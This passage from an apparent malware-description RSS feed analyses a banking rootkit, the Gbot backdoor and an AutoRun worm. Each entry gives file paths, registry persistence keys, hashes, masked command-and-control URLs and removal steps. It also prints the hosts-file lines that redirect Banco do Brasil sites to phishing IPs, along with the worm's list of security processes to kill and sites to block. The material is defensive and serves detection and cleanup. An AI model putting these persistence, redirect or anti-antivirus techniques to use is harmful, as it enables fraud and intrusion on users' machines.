\Device\Harddisk0\Partition2\windows\Downloaded Program Files\ABN.inf
\Device\Harddisk0\Partition2\windows\Downloaded Program Files\ABN.gpc
\Device\Harddisk0\Partition2\windows\Downloaded Program Files\gbiehabn.dll
\Device\Harddisk0\Partition2\windows\Downloaded Program Files\GbPluginABN.inf

\Device\Harddisk0\Partition2\windows\Downloaded Program Files\gbpdist.dll
\Device\Harddisk0\Partition2\windows\Downloaded Program Files\gbiehAbn.dll

\Device\Harddisk0\Partition2\windows\system32\drivers\gbpkm.sys

\Device\Harddisk0\Partition2\Arquivos de programas\GbPlugin\gbieh.gmd
\Device\Harddisk0\Partition2\Program Files\GbPlugin\gbieh.gmd
\Device\Harddisk0\Partition2\Program Files (x86)\GbPlugin\gbieh.gmd

\Device\Harddisk0\Partition2\Arquivos de programas\GbPlugin\bb.gpc
\Device\Harddisk0\Partition2\Program Files\GbPlugin\bb.gpc
\Device\Harddisk0\Partition2\Program Files (x86)\bb.gpc

\Device\Harddisk0\Partition2\Arquivos de programas\GbPlugin\gbieh.dll
\Device\Harddisk0\Partition2\Program Files\GbPlugin\gbieh.dll
\Device\Harddisk0\Partition2\Program Files (x86)\gbieh.dll

\Device\Harddisk0\Partition2\windows\Downloaded Program Files\gbieh.gmd

\Device\Harddisk0\Partition2\Arquivos de programas\GbPlugin\Sv.exe
\Device\Harddisk0\Partition2\Program Files\GbPlugin\Sv.exe
\Device\Harddisk0\Partition2\Program Files (x86)\GbPlugin\Sv.exe

\Device\Harddisk0\Partition2\Arquivos de programas\GbPlugin\gbpdist.dll
\Device\Harddisk0\Partition2\Program Files\GbPlugin\gbpdist.dll
\Device\Harddisk0\Partition2\Program Files (x86)\gbpdist.dll
&lt;/pre&gt;
&lt;p&gt;as well as the following registry keys:
&lt;/p&gt;
&lt;pre&gt;

\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\GbPluginAbn
\Registry\Machine\Software\Classes\CLSID\{2E3C3651-B19C-4DD9-A979-901EC3E930AF}
\Registry\Machine\Software\Classes\CLSID\{3F888695-9B41-4B29-9F44-6B560E464A16}
\Registry\Machine\Software\Classes\CLSID\{A3717295-941D-416F-9384-ED1736729F1C}
\Registry\Machine\Software\Classes\CLSID\{AF45043F-819C-47CC-9B37-94DBE50A6E63}
\Registry\Machine\Software\Classes\TypeLib\{04978612-A774-406D-AF1B-F44E2838D72A}
\Registry\Machine\Software\Classes\TypeLib\{9CA261C7-D518-4987-B434-10A1B243C8B8}
\Registry\Machine\Software\Classes\TypeLib\{AD764BE6-87A7-46A1-8C55-A712D079E749}

\Registry\Machine\System\CurrentControlSet\Services\GbpKm
\Registry\Machine\System\ControlSet001\Services\GbpKm
&lt;/pre&gt;
&lt;p&gt;Also the rootkit adds the following strings:
&lt;/p&gt;
&lt;pre&gt;
216.155.133.236		www2.bancobrasil.com.br
216.155.133.237		aapj.bb.com.br
127.0.0.1		localhost
Hosts doWindows
Exemplo:
127.0.0.1 www.microsoft.com.br
&lt;/pre&gt;
&lt;p&gt;to the file:
&lt;/p&gt;
&lt;pre&gt;%System%\drivers\etc\hosts
&lt;/pre&gt;
&lt;p&gt;Thus, it redirects users to the phishing sites when working with the Banco do Brasil bank's websites.
&lt;/p&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Removal_Instructions"&gt;Removal Instructions&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;If your computer was not protected by an antivirus and was infected with this malware, follow these steps to remove it:
&lt;/p&gt;&lt;p&gt;1. Delete the file:
&lt;/p&gt;
&lt;pre&gt;%Windir%\SysWOW64\drivers\plusdriver64.sys
&lt;/pre&gt;
&lt;p&gt;2. Remove the service named: 
&lt;/p&gt;
&lt;pre&gt;"Driverusbplus"
&lt;/pre&gt;
&lt;p&gt;3. Restore the original contents of the file: 
&lt;/p&gt;
&lt;pre&gt;%System%\drivers\etc\hosts
&lt;/pre&gt;
&lt;p&gt;This file usually contains the following text:
&lt;/p&gt;
&lt;pre&gt;
# Copyright (c) 1993-2009 Microsoft Corp.
	#
	# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
	#
	# This file contains the mappings of IP addresses to host names. Each
	# entry should be kept on an individual line. The IP address should
	# be placed in the first column followed by the corresponding host name.
	# The IP address and the host name should be separated by at least one
	# space.
	#
	# Additionally, comments (such as these) may be inserted on individual
	# lines or following the machine name denoted by a '#' symbol.
	#
	# For example:
	#
	#      102.54.94.97     rhino.acme.com          # source server
	#       38.25.63.10     x.acme.com              # x client host
	# localhost name resolution is handled within DNS itself.
	#	127.0.0.1       localhost
&lt;/pre&gt;
&lt;p&gt;4. Restore the boot options, running the following commands:
&lt;/p&gt;
&lt;pre&gt;
bcdedit/deletevalue loadoptions
bcdedit.exe-set TESTSIGNING OFF
&lt;/pre&gt;
&lt;p&gt;5. Perform a full system scan with an antivirus with updated databases.
&lt;/p&gt;
&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;&lt;b&gt;Can't find a description for a specific malware?&lt;/b&gt;&lt;br /&gt;
You can &lt;a href="http://www.dnt-lab.com/en/services"&gt;order a description for any computer malware, virus, trojan or worm&lt;/a&gt;.&lt;/div&gt;
</description>
			<pubDate>Sat, 09 Jul 2011 23:52:08 +0300</pubDate>
			<author>Playrhyba</author>
			<guid>http://www.totalmalwareinfo.com/eng/Rootkit.Win64.Banker.a</guid>
		</item>
		<item>
			<title>Backdoor.Win32.Gbot.ggb</title>
			<link>http://www.totalmalwareinfo.com/eng/Backdoor.Win32.Gbot.ggb</link>
			<description>&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;The description for &lt;b&gt;NewsChannel&lt;/b&gt; was created during beta-test of&amp;nbsp;&amp;laquo;Malware description on&amp;nbsp;demand&amp;raquo; service. Learn more about&amp;nbsp;at: &lt;a href="http://www.dnt-lab.com/en/services"&gt;&lt;nobr&gt;www.dnt-lab.com/en/services&lt;/nobr&gt;&lt;/a&gt;.&lt;/div&gt;
&lt;div style="float: right; margin-left: 10px; margin-bottom: 5px;"&gt;
&lt;table style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;tr style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;td colspan="2" style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px; background-color: #f8f8f8;"&gt;
&lt;div align="center"&gt;&lt;b&gt;NewsChannel&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;Last edited:
&lt;/p&gt;
&lt;/td&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;26.5.2012
&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;p&gt;Backdoor provides cybercriminals with remote access to an infected computer. It is Windows (PE-EXE) file. It is 193124 bytes in size. It is written in С++.
&lt;/p&gt;&lt;p&gt;MD5: 7D346E1BF063B57C547CB031CC5ACB7F
&lt;/p&gt;&lt;p&gt;SHA1: 73A1158CC70BA100999E3CB32A8AC2629E72F190
&lt;/p&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Installation"&gt;Installation&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;Once launched, the backdoor copies its body to a file:
&lt;/p&gt;
&lt;pre&gt;%Temp%\csrss.exe
&lt;/pre&gt;
&lt;p&gt;To launch the created copy automatically each time the system starts up it adds a reference to itself to the system registry:
&lt;/p&gt;
&lt;pre&gt;
[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows]
&amp;quot;Load&amp;quot;=&amp;quot;%Temp%\csrss.exe &amp;quot;
&lt;/pre&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Payload"&gt;Payload&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;To control the uniqueness of its process the backdoor creates a unique identifier with the following names:
&lt;/p&gt;
&lt;pre&gt;
{5D92BB9F-9A66-458f-ACA4-66172A7016D4}
{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
{6B985724-623F-492e-B0D6-C9715ADE853B}
{61B98B86-5F44-42b3-BCA1-33904B067B81}
{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
{CH5B35993-9674-43cd-8AC7-5BC5013E617B}
{HC0429A47-0CF0-4d1b-9616-C588FA0A3DDB}
{95F6585C-CC1E-4b52-A63B-9FBC6A94F371}
{B5B35993-9674-43cd-8AC7-5BC5013E617B}
{A5B35993-9674-43cd-8AC7-5BC5013E617B}
{C0429A47-0CF0-4d1b-9616-C588FA0A3DDB}
{CH5BCA615-C82A-4152-8857-BCC626AE4C8D}
{HC3B671F0-5D50-4dbe-AD9C-64A6167C57AD}
{45BCA615-C82A-4152-8857-BCC626AE4C8D}
{35BCA615-C82A-4152-8857-BCC626AE4C8D}
{43B671F0-5D50-4dbe-AD9C-64A6167C57AD}
{C66E79CE-8935-4ed9-A6B1-4983619CB925}
&lt;/pre&gt;
&lt;p&gt;Then malware creates a file with the name:
&lt;/p&gt;
&lt;pre&gt;%Documents and Settings%\%Current User%\Application Data\&amp;lt;xxx&amp;gt;.&amp;lt;zzz&amp;gt; – it is 600 bytes in size.
&lt;/pre&gt;
&lt;p&gt;where
&lt;/p&gt;&lt;p&gt;xxx – a random alphanumeric sequence,
&lt;/p&gt;&lt;p&gt;zzz – a random combination of digits.
&lt;/p&gt;&lt;p&gt;This file stores the basic backdoor settings. Next the trojan creates a link which downloads the file. The link is formed as follows:
&lt;/p&gt;
&lt;pre&gt;&lt;a href="http://" class="external free"&gt;http://&lt;/a&gt;&amp;lt;server_domain_name&amp;gt;/&amp;lt;path _to_file&amp;gt;/&amp;lt;parameters&amp;gt;
&lt;/pre&gt;
&lt;p&gt;where
&lt;/p&gt;
&lt;ul&gt;&lt;li&gt; server_domain_name:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;
booko*****catalog.com
freet*****iconline.com
sepa*****ilkandtee.com
high*****dbsearch.com
cata*****urcecodes.com
mobil*****sonlines.com
onlin*****uostore4you.com
nomo*****scat.com
lapo*****pia.com
fre*****sdb.com
sslpr*****mingshool.com
ddos*****eonline.com
samb*****ubonline.com
hl*****oz.com
&lt;/pre&gt;
&lt;ul&gt;&lt;li&gt; path_to_file:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;
blog/images/3521.jpg
blog/images/3522.jpg
blog/images/3523.jpg
&lt;/pre&gt;
&lt;ul&gt;&lt;li&gt; parameters:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;v&amp;lt;decimal_number&amp;gt;=&amp;lt; decimal_number &amp;gt;&amp;amp;tq=&amp;lt;encrypted_data&amp;gt;
&lt;/pre&gt;
&lt;p&gt;The downloaded files are stored under the names:
&lt;/p&gt;
&lt;pre&gt;
%Documents and Settings%\%Current User%\Application Data\Microsoft\conhost.exe – it is174592 bytes in size and detected by Kaspersky Antivirus as Backdoor.Win32.Gbot.grx
%Documents and Settings%\%Current User%\Application Data\dwm.exe – it is 185856 bytes in size and detected by Kaspersky Antivirus as Backdoor.Win32.Gbot.grx
&lt;/pre&gt;
&lt;p&gt;After that the trojan runs the downloaded files with the following parameters:
&lt;/p&gt;
&lt;pre&gt;
Start&amp;nbsp;%Documents and Settings%\%Current User%\Application Data\Microsoft\conhost.exe&amp;nbsp;%%Documents and Settings%\%Current User%\Application Data\Microsoft,&amp;lt;path_to_original_backdoor_file&amp;gt;

Start&amp;nbsp;%Documents and Settings%\%Current User%\Application Data\dwm.exe%%Documents and Settings%\%Current User%\Application Data,&amp;nbsp;%Documents and Settings%\%Current User%\Application Data\Microsoft
&lt;/pre&gt;
&lt;p&gt;To ensure that the copy created is launched automatically each time the system is rebooted, the following registry keys are created:
&lt;/p&gt;
&lt;pre&gt;
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run] 
&amp;quot;conhost&amp;quot; = &amp;quot;%Documents and Settings%\%Current User%\Application Data\Microsoft\conhost.exe&amp;quot;

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon] 
&amp;quot;Shell&amp;quot; = &amp;quot;explorer.exe,&amp;nbsp;%Documents and Settings%\%Current User%\Application Data\dwm.exe&amp;quot;
&lt;/pre&gt;
&lt;p&gt;Sends an HTTP request "POST" with encrypted information about the infected system to an attacker’s server: 
&lt;/p&gt;
&lt;pre&gt;zo***g.com/index.html?tq=&amp;lt;encrypted_information&amp;gt;
&lt;/pre&gt;
&lt;p&gt;Also it attempts to download malicious files by the following links:
&lt;/p&gt;
&lt;pre&gt;
http://mo*****om.at/polytheism/pictures/TanzenderShiva.jpg
http://cr*****afdesign.com/blog/images/share/stumble.png
http://cr*****afdesign.com/blog/images/share/facebook.png
http://rea*****waredevelopment.com/WindowsLiveWriter/web-2_0_thum
http://g*****ar.com/avatar.php?gravatar_id=f2a3889aff6fc9711a3cbc
http://f*****o.com/wp-content/uploads/2010/09/web-20-what-is-300x251.jpg
http://p**k.com/img/icons/twitter.png
http://p**k.com/img/icons/facebook.png
http://he*****lifenow.com/templates/7348/images/header_logo.jpg
http://he*****lifenow.com/templates/7349/images/header_logo.jpg
http://hol*****ndbarrett.com/images/footer/account.jpg
http://hol*****ndbarrett.com/images/footer/account.gif
http://nat*****utoelectric.com/images/50-217-1_F_1_.jpg
http://nat*****utoelectric.com/images/50-217-1_F_2_.jpg
http://onl*****zdirectory.com/images/PowerShowBanner.gif
http://onl*****zdirectory.com/images/PowerHideBanner.gif
http://los*****aganda.net/blog/pics/3321.jpg
http://los*****aganda.net/blog/pics/3322.jpg
http://jap*****greenteaonline.com/assets/images/greentea-cha-1.gif
http://jap*****greenteaonline.com/assets/images/greentea-cha-2.gif
http://gre*****balteaonline.com/images/greenherbalteagirlholdingcup250.gif
http://gre*****balteaonline.com/images/greenherbalteagirlholdingcup350.gif
http://onl*****stitute.com/g7/images/logo.jpg
http://onl*****stitute.com/g7/images/logo2.jpg
http://onl*****stitute.com/g7/images/logo3.jpg
http://onl*****stitute.com/g7/images/logo4.jpg
http://onl*****tingsecretfriends.com/images/im133.jpg
http://onl*****tingsecretfriends.com/images/im134.jpg
&lt;/pre&gt;
&lt;p&gt;The downloaded files are stored in the temporary files folder of the current user: 
&lt;/p&gt;
&lt;pre&gt;%Temp%\&amp;lt;rnd&amp;gt;.tmp
&lt;/pre&gt;
&lt;p&gt;where &amp;lt;rnd&amp;gt; - is a whole decimal number. The trojan opens a random TCP port to get a remote access to infected system, for example, "57414", "57455" or "62202." HTTP proxy server is created at the same port:
&lt;/p&gt;
&lt;pre&gt;127.0.0.1:&amp;lt;port_number&amp;gt;
&lt;/pre&gt;
&lt;p&gt;To change the settings in Internet Explorer the trojan modifies the following registry keys:
&lt;/p&gt;
&lt;pre&gt;
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
&amp;quot;ProxyEnable&amp;quot;=dword:00000001
&amp;quot;ProxyServer&amp;quot;=&amp;quot;http=127.0.0.1:&amp;lt;port_number&amp;gt;&amp;quot;

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
&amp;quot;DefaultConnectionSettings&amp;quot;=&amp;lt;address_of _proxy _ in_hex&amp;gt;
&amp;quot;SavedLegacySettings&amp;quot;=&amp;lt;address_of_proxy_in_hex&amp;gt;
&lt;/pre&gt;
&lt;p&gt;It attempts to disrupt antivirus applications:
&lt;/p&gt;
&lt;pre&gt;
AVG
Avira
Dr.Web
Norton
Symantec
Avast
McAfee
ESET NOD32
Kaspersky
BitDefender
Windows Defender
&lt;/pre&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Removal_instructions"&gt;Removal instructions&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;If your computer does not have an antivirus, and is infected by this malicious program, follow the instructions below to delete it:
&lt;/p&gt;&lt;p&gt;1. Using Task Manager terminate the trojan processes:
&lt;/p&gt;
&lt;pre&gt;
conhost.exe
dwm.exe
&lt;/pre&gt;
&lt;p&gt;2. Delete the registry keys in system registry:
&lt;/p&gt;
&lt;pre&gt;
[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows]
&amp;quot;Load&amp;quot;=&amp;quot;%Temp%\csrss.exe &amp;quot;

[HKLM\Software\Microsoft\Windows\CurrentVersion\Run] 
&amp;quot;conhost&amp;quot; = &amp;quot;%Documents and Settings%\%Current User%\Application Data\Microsoft\conhost.exe &amp;quot; 

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon] 
&amp;quot;Shell&amp;quot; = &amp;quot;explorer.exe,&amp;nbsp;%Documents and Settings%\%Current User%\Application Data\dwm.exe &amp;quot;
&lt;/pre&gt;
&lt;p&gt;3. Restore original values of the keys in system registry:
&lt;/p&gt;
&lt;pre&gt;
[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon] 
&amp;quot;Shell&amp;quot; = &amp;quot;explorer.exe,&amp;nbsp;%Documents and Settings%\%Current User%\Application Data\dwm.exe&amp;quot;
&lt;/pre&gt;
&lt;p&gt;to:
&lt;/p&gt;
&lt;pre&gt;
[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon] 
&amp;quot;Shell&amp;quot; = &amp;quot;explorer.exe&amp;quot;
&lt;/pre&gt;
&lt;p&gt;4. Delete files:
&lt;/p&gt;
&lt;pre&gt;%Documents and Settings%\%Current User%\Application Data\&amp;lt;xxx&amp;gt;.&amp;lt;zzz&amp;gt;
&lt;/pre&gt;
&lt;p&gt;where 
&lt;/p&gt;&lt;p&gt;xxx – a random alphanumeric sequence,
&lt;/p&gt;&lt;p&gt;zzz – a random combination of digits.
&lt;/p&gt;
&lt;pre&gt;
%Temp%\csrss.exe
%Documents and Settings%\%Current User%\Application Data\Microsoft\conhost.exe
%Documents and Settings%\%Current User%\Application Data\dwm.exe
&lt;/pre&gt;
&lt;p&gt;5. Clear the Temporary Internet Files folder, that may contain infected files.
&lt;/p&gt;&lt;p&gt;6. Disable proxy in Internet browser.
&lt;/p&gt;&lt;p&gt;7. Perform a full system scan with an antivirus with updated databases.
&lt;/p&gt;
&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;&lt;b&gt;Can't find a description for a specific malware?&lt;/b&gt;&lt;br /&gt;
You can &lt;a href="http://www.dnt-lab.com/en/services"&gt;order a description for any computer malware, virus, trojan or worm&lt;/a&gt;.&lt;/div&gt;
</description>
			<pubDate>Sun, 03 Jul 2011 17:54:02 +0300</pubDate>
			<author>Playrhyba</author>
			<guid>http://www.totalmalwareinfo.com/eng/Backdoor.Win32.Gbot.ggb</guid>
		</item>
		<item>
			<title>Worm.Win32.AutoRun.beot</title>
			<link>http://www.totalmalwareinfo.com/eng/Worm.Win32.AutoRun.beot</link>
			<description>&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;The description for &lt;b&gt;NewsChannel&lt;/b&gt; was created during beta-test of&amp;nbsp;&amp;laquo;Malware description on&amp;nbsp;demand&amp;raquo; service. Learn more about&amp;nbsp;at: &lt;a href="http://www.dnt-lab.com/en/services"&gt;&lt;nobr&gt;www.dnt-lab.com/en/services&lt;/nobr&gt;&lt;/a&gt;.&lt;/div&gt;
&lt;div style="float: right; margin-left: 10px; margin-bottom: 5px;"&gt;
&lt;table style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;tr style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;td colspan="2" style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px; background-color: #f8f8f8;"&gt;
&lt;div align="center"&gt;&lt;b&gt;NewsChannel&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;Last edited:
&lt;/p&gt;
&lt;/td&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;26.5.2012
&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;p&gt;Worm copies itself to local disks and accessible network resources. It is Windows (PE-EXE file). It is 47733 bytes in size. It is packed by FSG. Unpacked file size is about 160 Kb. It is written in Delphi.
&lt;/p&gt;&lt;p&gt;MD5: 950828248CEE2A08086B2207C5ED8516
&lt;/p&gt;&lt;p&gt;SHA1: 8CE4CC71EAB155C2F0075B27287D7DE625A201A2
&lt;/p&gt;
&lt;table id="toc" class="toc"&gt;&lt;tr&gt;&lt;td&gt;&lt;div id="toctitle"&gt;&lt;h2&gt;Contents&lt;/h2&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li class="toclevel-1 tocsection-1"&gt;&lt;a href="#Installation"&gt;&lt;span class="tocnumber"&gt;1&lt;/span&gt; &lt;span class="toctext"&gt;Installation&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li class="toclevel-1 tocsection-2"&gt;&lt;a href="#Propagation"&gt;&lt;span class="tocnumber"&gt;2&lt;/span&gt; &lt;span class="toctext"&gt;Propagation&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li class="toclevel-1 tocsection-3"&gt;&lt;a href="#Payload"&gt;&lt;span class="tocnumber"&gt;3&lt;/span&gt; &lt;span class="toctext"&gt;Payload&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li class="toclevel-1 tocsection-4"&gt;&lt;a href="#Removal_instruction"&gt;&lt;span class="tocnumber"&gt;4&lt;/span&gt; &lt;span class="toctext"&gt;Removal instruction&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;script&gt;if (window.showTocToggle) { var tocShowText = "show"; var tocHideText = "hide"; showTocToggle(); } &lt;/script&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Installation"&gt;Installation&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;Once launched, the worm copies its body to a system disk of a user’s computer.
&lt;/p&gt;&lt;p&gt;To ensure that the copy created is launched automatically each time the system is rebooted, the following registry key is created:
&lt;/p&gt;
&lt;pre&gt;[HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
&lt;/pre&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Propagation"&gt;Propagation&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;The worm copies its body at all writable removable disks connected to the infected computer. The file "AutoRun.inf" is created together with a copy at the root of an infected disk. It provides for a copy to run each time a user opens an infected removable disk using "Explorer".
&lt;/p&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Payload"&gt;Payload&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;The worm has the following functional:
&lt;/p&gt;
&lt;ul&gt;&lt;li&gt; terminates processes:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;
360rpt.exe
360Safe.exe
360safebox.exe
360tray.exe
AgEntSvr.exe
AntiArp.exe
AppSvc32.exe
Arvmon.exe
AutoGuarder.exe
Autoruns.exe
Avgrssvc.exe
AvMonitor.exe
Avp.com
Avp.exe
CCEnter.exe
ccSvcHst.exe
HiJackThis.exe
IceSword.exe
iparmo.exe
Iparmor.exe
isPwdSvc.exe
kabaload.exe
KaScr9cn.SCR
KASMain.exe
KASTask.exe
KAS42.exe
KASDX.exe
KASPFW.exe
KASSetup.exe
KISLnchr.exe
KMailMon.exe
KPFW42.exe
KPFW42X.exe
KPFWSvc.exe
KRepair.COM
KVCEnter.kxp
KvDetEct.exe
kvfw.exe
KvfwMcl.exe
KVMonXP.kxp
KVMonXP_1.kxp
kvol.exe
kvolself.exe
KvReport.kxp
KV9can.kxp
KV9rvXP.exe
KVStub.kxp
kvupload.exe
kvwsc.exe
KvXP.kxp
KvXP_1.kxp
KWatch.exe
KWatch9x.exe
KWatchX.exe
MagicSet.exe
mmqczj.exe
mmsk.exe
NAVSetup.exe
nod32krn.exe
nod32kui.exe
PFW.exe
PFWLiveUpdate.exe
QHSET.exe
Ras.exe
Rav.exe
RavMon.exe
RavMonD.exe
RavStore.exe
RavStub.exe
ravt08.exe
RavTask.exe
RegClean.exe
RegEx.exe
rfwcfg.exe
RfwMain.exe
rfwolusr.exe
rfwProxy.exe
rfwsrv.exe
RsAgEnt.exe
RsMain.exe
runiep.exe
safebank.exe
safelive.exe
scan42.exe
9canFrm.exe
shcfg42.exe
SREng.exe
SREngPS.exe
symlcsvc.exe
syscheck.exe
Syscheck2.exe
SysSafe.exe
UmxAgEnt.exe
UmxCfg.exe
UmxPol.exe
UpLive.exe
LiveUpdate360.exe
&lt;/pre&gt;
&lt;ul&gt;&lt;li&gt; Blocks running of these processes by creating the following registry keys:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;
 [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\&amp;lt;Application name&amp;gt;]
&amp;quot;debugger&amp;quot;
&lt;/pre&gt;
&lt;p&gt;where &amp;lt;Application name&amp;gt; - is process names from the list above.
&lt;/p&gt;
&lt;ul&gt;&lt;li&gt; Modifies the hosts file:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;%System%\drivers\etc\hosts
&lt;/pre&gt;
&lt;ul&gt;&lt;li&gt; Blocks addressing the following resources:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;
www.360.cn
www.360safe.cn
www.360safe.com
www.chinakv.com
www.rising.com.cn
www.jiangmin.com
www.duba.net
www.eset.com.cn
www.nod32.com
www.shadu.duba.net
union.kingsoft.com
www.kaspersky.com.cn
www.virustotal.com
www.virscan.org
www.kaspersky.com
www.lanniao.org
www.nod32club.com
www.dswlab.com
bbs.sucop.com
tool.ikaka.com
qihoo.com
www.kafan.cn8
&lt;/pre&gt;
&lt;ul&gt;&lt;li&gt; Sends to a malicious server information about the system:
&lt;/li&gt;&lt;/ul&gt;
&lt;p&gt;- IP-address of an infected computer;
&lt;/p&gt;&lt;p&gt;- physical address of an active network adapter;
&lt;/p&gt;&lt;p&gt;- OS version.
&lt;/p&gt;
&lt;ul&gt;&lt;li&gt; According to received from a server links an attacker can upload files, storing them in a temporary files folder of the current user "%Temp%".
&lt;/li&gt;&lt;li&gt; In the course of its work the worm may connect to the following servers:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;
down.t***ai.com
208.***.210.29
&lt;/pre&gt;
&lt;ul&gt;&lt;li&gt; The embedding of malicious code into an address space of the following processes is possible:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;
smss.exe
csrss.exe
winlogon.exe
services.exe
lsass.exe
&lt;/pre&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Removal_instruction"&gt;Removal instruction&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;If your computer does not have an antivirus, and is infected by this malicious program, follow the instructions below to delete it:
&lt;/p&gt;&lt;p&gt;1. Perform a full system scan with an antivirus with updated databases.
&lt;/p&gt;
&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;&lt;b&gt;Can't find a description for a specific malware?&lt;/b&gt;&lt;br /&gt;
You can &lt;a href="http://www.dnt-lab.com/en/services"&gt;order a description for any computer malware, virus, trojan or worm&lt;/a&gt;.&lt;/div&gt;
</description>
			<pubDate>Sun, 26 Jun 2011 00:40:50 +0300</pubDate>
			<author>Playrhyba</author>
			<guid>http://www.totalmalwareinfo.com/eng/Worm.Win32.AutoRun.beot</guid>
		</item>
		<item>
			<title>Trojan-Spy.Win32.Batton.rk</title>
			<link>http://www.totalmalwareinfo.com/eng/Trojan-Spy.Win32.Batton.rk</link>
			<description>&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;The description for &lt;b&gt;NewsChannel&lt;/b&gt; was created during beta-test of&amp;nbsp;&amp;laquo;Malware description on&amp;nbsp;demand&amp;raquo; service. Learn more about&amp;nbsp;at: &lt;a href="http://www.dnt-lab.com/en/services"&gt;&lt;nobr&gt;www.dnt-lab.com/en/services&lt;/nobr&gt;&lt;/a&gt;.&lt;/div&gt;
&lt;div style="float: right; margin-left: 10px; margin-bottom: 5px;"&gt;
&lt;table style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
